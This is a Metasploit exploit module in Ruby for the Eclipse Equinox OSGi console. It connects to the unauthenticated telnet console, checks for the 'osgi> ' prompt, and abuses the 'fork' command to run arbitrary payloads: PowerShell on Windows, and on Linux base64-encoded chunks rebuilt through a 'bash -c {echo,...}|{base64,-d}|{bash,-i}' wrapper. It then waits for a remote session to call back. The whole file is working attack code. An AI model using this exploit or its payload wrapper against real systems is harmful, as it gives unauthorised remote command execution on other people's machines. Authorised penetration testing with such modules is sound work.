##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'
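class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  TELNET_IAC = Msf::Exploit::Remote::Telnet

  # Prompt the Equinox console prints once it is ready for commands. `check`
  # reports Vulnerable only when the post-negotiation read is exactly this, so
  # a console with a banner or a customised prompt is reported Safe (false
  # negative rather than false positive).
  OSGI_PROMPT = 'osgi> '.freeze

  # Option negotiation the console sends on connect: WILL ECHO, WILL SGA,
  # DO NAWS, DO TTYPE. Only this exact sequence is answered; anything else is
  # returned to the caller as-is.
  TELNET_GREETING = (
    TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_ECHO +
    TELNET_IAC::IAC + TELNET_IAC::WILL + TELNET_IAC::OPT_SGA +
    TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_NAWS +
    TELNET_IAC::IAC + TELNET_IAC::DO + TELNET_IAC::OPT_TTYPE
  ).freeze

  # Sub-negotiation reply to DO TTYPE: IAC SB TTYPE IS(0x00) "xterm-256color" IAC SE.
  TERMINAL_TYPE_REPLY = (
    TELNET_IAC::IAC + TELNET_IAC::SB + TELNET_IAC::OPT_TTYPE +
    "\x00xterm-256color" + TELNET_IAC::IAC + TELNET_IAC::SE
  ).freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Eclipse Equinox OSGi Console Command Execution',
        'Description' => %q{
          Exploit Eclipse Equinox OSGi (Open Service Gateway initiative) console
          'fork' command to execute arbitrary commands on the remote system.
        },
        'Author' => [
          'Quentin Kaiser <[email protected]>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
        ],
        'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
          [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
        ],
        'CmdStagerFlavor' => [ 'bourne' ],
        'DisclosureDate' => '2018-02-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    # The payload is handed over inside the console command itself; no
    # listener on our side is involved, so the HTTP server options are noise.
    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
    register_options([
      OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
    ])
  end

  # Connects to the console, answers its telnet negotiation and reports
  # Vulnerable if the server then hands out the 'osgi> ' prompt. No
  # credentials are exchanged at any point, which is the exposure this module
  # relies on. Connection failures are reported as Unknown instead of raised so
  # that `check` can be run on its own, and the socket is always released.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    banner = open_console
    return Exploit::CheckCode::Vulnerable if banner == OSGI_PROMPT

    Exploit::CheckCode::Safe
  rescue ::Timeout::Error, Rex::ConnectionError => e
    vprint_error("#{peer} - #{e.message}")
    Exploit::CheckCode::Unknown
  ensure
    disconnect
  end

  # Verifies the console answers, then pushes the payload through the
  # console's 'fork' command: a PowerShell one-liner on Windows, the Bourne
  # CmdStager (via execute_command) on Linux. Waits up to TIME_WAIT seconds
  # for the session to call back before returning.
  def exploit
    print_status('Accessing the OSGi console ...')

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
    end

    if target['Platform'] == 'win'
      psh = cmd_psh_payload(
        payload.encoded,
        payload_instance.arch.first,
        { encode_final_payload: true, remove_comspec: true }
      )
      exec_command("fork \"#{psh}\"")
    else
      execute_cmdstager({ flavor: :bourne })
    end

    print_status("#{rhost}:#{rport} - Waiting for session...")

    # Poll for the session; the console socket stays open meanwhile and is
    # torn down in the ensure clause.
    datastore['TIME_WAIT'].times do
      Rex.sleep(1)
      break if session_created?
    end
  rescue ::Timeout::Error, Rex::ConnectionError => e
    # ConnectionRefused / HostUnreachable / ConnectionTimeout all derive from
    # Rex::ConnectionError.
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
  ensure
    disconnect
  end

  # Opens a fresh console connection, sends one command, then closes the
  # console session politely ('disconnect', confirmed with 'y'). The command
  # is written to the console verbatim, so the caller is responsible for its
  # quoting. The socket itself is left open for the caller to disconnect.
  #
  # @param cmd [String] full console command line, e.g. 'fork "..."'
  def exec_command(cmd)
    open_console
    print_status('Exploiting...')
    sock.put("#{cmd}\r\n")
    sock.get
    sock.put("disconnect\r\n")
    sock.get
    sock.put("y\r\n")
  end

  # CmdStager hook. Wraps a staged Bourne-shell chunk so that it survives the
  # argument splitting done by Runtime.getRuntime().exec() on Linux: the chunk
  # travels as base64 (no whitespace, hence strict_encode64) and is rebuilt on
  # the target with brace expansion, so the target needs bash.
  #
  # @param cmd [String] shell fragment produced by the CmdStager
  # @param _opts [Hash] unused, kept for the CmdStager interface
  def execute_command(cmd, _opts = {})
    cmd_b64 = Base64.strict_encode64(cmd)
    exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
  end

  private

  # Connects and performs the console's telnet negotiation once. Returns the
  # data read after the negotiation (the prompt on a live console), or
  # whatever the first read produced when the greeting did not match
  # TELNET_GREETING (possibly nil). Shared by `check` and `exec_command` so
  # both speak the same handshake.
  #
  # @return [String, nil]
  def open_console
    connect
    res = sock.get_once
    if res == TELNET_GREETING
      sock.put(TERMINAL_TYPE_REPLY)
      res = sock.get_once
    end
    res
  end
end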